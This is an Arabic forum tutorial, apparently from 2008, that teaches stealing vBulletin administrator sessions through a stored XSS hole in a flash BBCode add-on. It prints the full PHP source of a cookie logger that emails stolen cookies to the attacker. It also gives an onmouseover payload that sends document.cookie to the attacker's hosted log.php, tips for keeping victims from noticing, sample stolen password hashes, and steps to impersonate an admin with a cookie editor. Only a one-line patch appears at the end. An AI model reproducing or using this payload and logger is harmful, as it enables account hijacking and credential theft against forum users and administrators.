[msg]ارجوا عدم استعمال الثغره على اخوانك العرب ...[/msg]بسم الله الرحمن الرحيم
والصلاة والسلام على أشرف خــلق الله
سيدنا وحبيبنا محمد وعلى آله وصحبه أجمعين..
وبعد...
بمناسبه عيد الفطر السعيد
وعودتي على اعضاء منتديات مياسه
يشرفني بأني اشرح اقوى ثغرات المنتديات
من نوع فيبولتين vb المعروفه والجميله جدا
ويتميز هذا النوع من المنتديات بسهوله استعماله
وكثرت الهاكات التي تركب به الجميله جدا
ومن اجمل الهاكات هو الصندوق السحري و الماسي
ولكن مافي شئ كـامل الا الله سبحان وتعالى
وفي هذا النصدوق السحري يوجد ثلاث ثغرات
وهم:- ثغره الفلاش ثغره الريل بلاير ثغره تنسيق القصيده
وهي من اكتشاف اخونا العزيز: العنــدليب
وهم من نوع xss
نبدأ الشرح
ولكـن قبـل لا ابدأ الشرح
يــاليت تقرأ هذه العباره:-
" أقســم باللــه أني ما أستخدم الثغره على المنتديات العربيه
والاسلاميه"
اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد
بسم الله نبدأ
مذا تحتاج الثغره:-
لوجو مبرمج بلغه الـ php
واخوانا ديفل مبرمج php
ماقصر سوالنا لوج قوي جدا
كود PHP:
<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get ******* And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=*******
[ MSG ]
Name : Attack1
******* : *******
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get ******* Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = "(تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى)"; // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];
/* Start */
$Replace******1 = array("=",";");
$Replace******2 = array("[ "," ] ");
$Cooki_e = str_replace($Replace******1,$Replace******2,$Cooki_e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <log-(تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى)>";
$Msg =
"
Mr Attacker ;) ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <System Evil> <xxx (hacker)> <s4a Members> ]
[ (تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى) - (تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى) ]
-----------------------------------------------
****** ::
".$Cooki_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/************************************************** ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>
اعمل التغييرات الاتيه:-
YourMail = "(تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى)"; // Your E-mail
وضع اميلك بداله
والتغيير الثاني هو
كلمه
C o o k i e
وهي تخرج على هيئئه 6 نجوم
******
غيرها
وضع كلمه
C o o k i e
ولكن ازل المسافات بين الاحرف
لكي تكون كلمه واحده بدون مسافات
لكي يكتمل اللوج عندنا
وبعد التعديل اعمل على المفكره عندما تنسخ كود اللوج
واحفظه بأسم log
وغير الامتداد الى php
وارفع اللوج على موقعك الشخصي
او اي موقع يقبل php
والحين نجرب مع بعض على طريقه استغلال الثغره
وراج اجرب على ثغره الفلاش لانها الاسهل
على المبتدئين
هذا كود الثغره
كود PHP:
[flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(****************);'[/flash]
والان نأتي بربط كود الثغره بملف فلاشي
لكي نخدع به صاحب المنتدى او اي مشرف من المشرفين
والربط بيكون على الشكل التالي:-
كود PHP:
[flash=http://www.xxxx.com/card/x/swf/n.swf]onmouseover='location.href="http://www.xxx.com/log.php?nm=al-battar.net&re=http://www.xxxx.com/vb/showthread.php?t=1245&id="+****************'[/flash
والحين يا شطار ندخل في المتغيرات:_
اولاً:-
http://www.xxxxxx.com/test.swf
نغيره الى اي ملف فلاشي
وينصح بملف صغير الحجم
لكي لا تنكشف ويتخرب شغلك
ثانياً:-
www.xxx.com/log.php
هنا غير الرابط هذا
برابط اللوج الذي رفعته على موقعك
بعد عمليه التعديل
ثالثاً:-
http://www.xxx.com/vb/showthread.php?t=1245
هذا ياشباب مهم يعني مثلا اى واحد يمر المآوس قدام الفلاش راح يودييه للصفحه الموجوده بالكود
وانا انصحك تحط يرجع لنفس الصفحه الموجود فيها الفلاش عشان لا يشك الضحيه
ونشكر اخونا ديفيل لان طور اللوجو لان اول لوجو لامريت المآوس يوديك لصفحه بيضه
يعني نغير الرابط هذا
الى اي رابط موضوع
وينصح برابط الموضوع نفسه
وجزاه الله خير دع الخياار لناااا الله يوفقه في الوجو الجديد ( المطور )
ملإحظه ( إكيد بعضكم يبي يقول شلؤن اعرف انه هذا الكوكيز لاى منتدى )
اجابة السؤال ( الخيآر الثالث بالكوكيز وهى الصفحه المراد الذهاب لها بعد مررو مآوس الضحيه امام الفلاش
راح تجيك داخل الرساله وجذى تعرف لاى منتدى هذا الكوكيز )
الحين هذى شكل الرساله اللى راح توصلك ( بهذا الشكل )
****** ::
bbsessionhash[ 6b0edfdfsfd3ffbe27bc928936aba42f3523efa ] bblastvisit[ 1119817asd013 ]
bblastactivity[ 11198as17959 ] bbforum_view[
3523e417e8fb0bc834d2abaf8f9eb54cax1x-ix2yix1119817237y_ ] bbthread_lastview[
cf56fed12e97ac29c33812245fe8e28aax1x-ix1985ysx10x\"1111907592\"y_ ] bbuserid[
6224 ] bbpassword[ 9360b6686129d3d676df4e6974e8f730
المهم بالرساله كله التالى
bbpassword
bbuserid
bblastactivity
bblastvisit
واكيد لازم تكون مسجل بالمنتدى اللى ودك تدخل بنك الادمن فيه
الحين نطلع اللى نبيه من الكوكيز اللى وصل لنا بالإيميل
الباسوورد المشفر
bbpassword
9360b6686129d3d676df4e6974e8f730
رقم العضويه
bbuserid
1
bblastactivity
1119817959
bblastvisit
1119817013
الآن إفتح برنامج الكوكيز
واللى ماعنده يحمله من هالراابط
من هنا
والان بعد ما استهدفنا الادمن الي نبي ندش بعضويته
وصلنا معلومات الكوكيز على الاميل
شوف الصوره
وبعد ما حملنا البرنامج محرر الكوكيز
نفتح ونغير المعلومات الي معلومات
التي وصلتلنا على الاميل
ملاحظه ( bb مو بكل المنتديات تبدآ بكل كلمه مثلا منتديات تبدآ بـ rr شيء عـآدى )
والآن بعد التعديل إغلق البرنامج واذهب للمتصفح واذهب للمنتدى سوف ترى انك
اصبحت ادمن كماا بالصوووره
تمت التجربه على عده منتدياات بنجااااح
والثغره لازالت شغاله واستغلالهاا سهل مثل ماتشووفوون
الترقيع
كلمة C o o k i e مع مراعات حذف المسافات بين الحروف اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة
ولكم خالص تحيه
لا تـنسونا بالدعــاء
وانتظروا الجديد دائما على منتديات مياسه
والافضل بإذن الله قريب
والثغره إهذاء الى الاخ سكادا
وصقر البوادي
ومشرفين مياسه والاداريين واعضائها
وتم اغلاق هذه الثغره من منتديات مياسه
ولله الحمد
واي شئ تطور ابلغكم انشالله
تقبلو تحياتي
اخوكم:-
مــاجد
آخر 10 مشاركات
مشاركة رقم :
31
في 10-Mar-2008 الساعة :
07:59 PM
العرض العادي
